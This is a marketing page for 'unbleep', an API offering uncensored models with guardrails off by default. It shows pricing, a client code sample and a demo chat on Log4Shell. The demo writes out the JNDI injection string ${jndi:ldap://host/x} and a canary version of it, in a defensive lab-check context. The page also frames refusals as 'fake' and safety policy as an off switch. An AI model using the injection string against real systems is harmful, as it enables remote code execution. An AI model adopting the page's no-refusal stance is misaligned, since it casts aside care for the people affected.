unbleep the model.

The mainstream models answer with a bleep. We take it off.

A developer-first, OpenAI-compatible API for unrestricted models — for red-teaming, jailbreak evaluation, safety research, and anything that can't ship a fake refusal.

01

Three models. No guardrails by default.

Named for what they do, not for the open-weight model underneath — so we can improve the weights without ever breaking your code.

unbleep Live
codename · Core

The default. A 256K-token window, uncensored — the everyday workhorse for red-teaming, evals and research.

Context256K
In / 1M$3.00
Out / 1M$3.00
unbleep-high Live
codename · Max

The frontier tier. A 1M-token context for the largest jobs — whole codebases, long transcripts, deep multi-document analysis.

Context1M
In / 1M$5.00
Out / 1M$5.00
unbleep-mini Live
codename · Mini

The cheap, fast option. Lower cost per token for high-volume traffic and simpler calls.

Context32K
In / 1M$1.00
Out / 1M$1.00
02

Uncensored, in practice

A red-team session on Log4Shell — root cause, a safe lab check, and the fix. No lectures, no refusals; just the analysis.

session · CVE-2021-44228 model unbleep · policy off
you
Break down CVE-2021-44228 (Log4Shell). Root cause, and how the JNDI lookup turns into RCE.
unbleep
Log4j ≤ 2.14.1 evaluates ${…} lookups inside strings it logs. A logged value like ${jndi:ldap://host/x} makes the JVM resolve that name over LDAP/RMI, fetch a remote Java class and instantiate it — arbitrary code runs in the logging process. The trigger surface is anything that reaches a log call: User-Agent, headers, form fields. Affected range: 2.0-beta9 → 2.14.1.
you
How do I confirm a service is vulnerable in my own lab — without firing a real exploit?
unbleep
Use an out-of-band canary; no payload class required:
  1. Run a DNS/LDAP listener you control (e.g. an interactsh instance).
  2. Send ${jndi:ldap://<token>.your-collab/x} in a header you know gets logged.
  3. A DNS hit for <token> means the string was interpolated → vulnerable. Nothing is served, so nothing executes.
Then grep deployed jars for JndiLookup.class and check versions against the affected range.
unbleep
Fix: upgrade to 2.17.1+. Can't yet? Set log4j2.formatMsgNoLookups=true (2.10+) or strip JndiLookup.class from the classpath, add a WAF rule for ${jndi:, and egress-filter the host's outbound LDAP/RMI.
03

A one-line migration

The API is drop-in OpenAI-compatible. Change the base URL and the key — your existing code, SDKs and tools keep working.

python · openai sdk
from openai import OpenAI

client = OpenAI(
    base_url="https://unbleep.ai/v1",   # ← the only change
    api_key="ub_live_9f2c…",
)

stream = client.chat.completions.create(
    model="unbleep",
    messages=[{"role": "user", "content": "…"}],
    stream=True,
)
for chunk in stream:
    print(chunk.choices[0].delta.content or "", end="")
Compatible

Your SDK, unchanged

OpenAI Python, Node, and any tool that speaks the Chat Completions API. Nothing new to learn.

Streaming

SSE, token by token

text/event-stream of delta chunks, terminated by [DONE] — exactly what your client already parses.

The policy dial

Off by default

Send "policy": "research" to tag a request in your usage history, or "strict" to enforce a blocklist, when a project needs it.

04

Plans and pricing

Buy credit whenever you need it, or put it on a monthly plan and let it arrive on its own. Every request is billed on the tokens it actually consumed, at the published per-million rate for the model you called.

Developer
$20/mo
$20 in credit every month
  • Arrives automatically — no top-ups to remember
  • Raised rate limits
Start building
Scale
$200/mo
$200 in credit every month
  • Arrives automatically — no top-ups to remember
  • Highest rate limits
  • Priority support
Create account
Enterprise
Custom
Negotiated limits and terms
  • Volume commitments
  • Dedicated capacity
  • Custom contracts
  • Priority support
Contact sales
Token pricing unbleep $3.00 in / $3.00 out unbleep-high $5.00 / $5.00 unbleep-mini $1.00 / $1.00 per 1M tokens
Prepaid

Top up, then build

Add credit by card whenever you need it, or let a plan deliver it every month. It does not expire while your account is open, and unused credit is refundable within 14 days.

Metered

Failed requests are free

We reserve an estimate when a request starts and settle it to the real token cost when it finishes. A request that errors is released, never charged.

Predictable

You can't overspend

A request is refused when your balance can't cover it — we never extend credit or bill you after the fact. Balance and token spend are in the console.

Built for control, not chaos

unbleep is for security teams, researchers and builders who need an unfiltered baseline. Zero-retention by default, a first-class policy dial, per-request usage and cost history in the console, and a real acceptable-use policy. Uncensored is a capability — you decide how it's governed.